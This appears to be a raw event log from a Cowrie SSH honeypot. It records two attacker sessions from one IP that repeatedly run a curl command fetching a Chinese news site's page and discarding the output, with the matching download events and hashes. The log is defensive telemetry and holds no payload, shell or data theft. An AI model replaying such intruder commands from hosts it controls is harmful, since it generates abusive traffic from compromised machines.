{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.177121Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.181185Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.188173Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.188925Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.199477Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.212654Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.213403Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.217041Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.226989Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.227676Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.247772Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.249148Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.252787Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.266652Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.267343Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.276175Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.284845Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.285489Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.302532Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.303930Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.304539Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.314970Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.323185Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.324062Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.328171Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.342013Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.342723Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.344764Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.360312Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.360943Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.363677Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.380697Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.381364Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.396581Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.397249Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.424562Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.425395Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.432537Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.433097Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.467360Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.468202Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.470972Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.471691Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.506091Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.507047Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.510620Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.511211Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.542000Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.542861Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.548657Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.549431Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.555154Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.562307Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.570526Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.578328Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.579136Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.586035Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.586834Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.590802Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.603087Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.608213Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.614321Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.615710Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.616307Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.618736Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.622393Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.625698Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.626925Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.653959Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.654749Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.659063Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.662480Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.666825Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.667655Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.679825Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.692002Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.693480Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.704086Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.705762Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.706558Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.720080Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.726516Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.730508Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.731452Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.744564Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.745490Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.771694Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.772682Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.783013Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
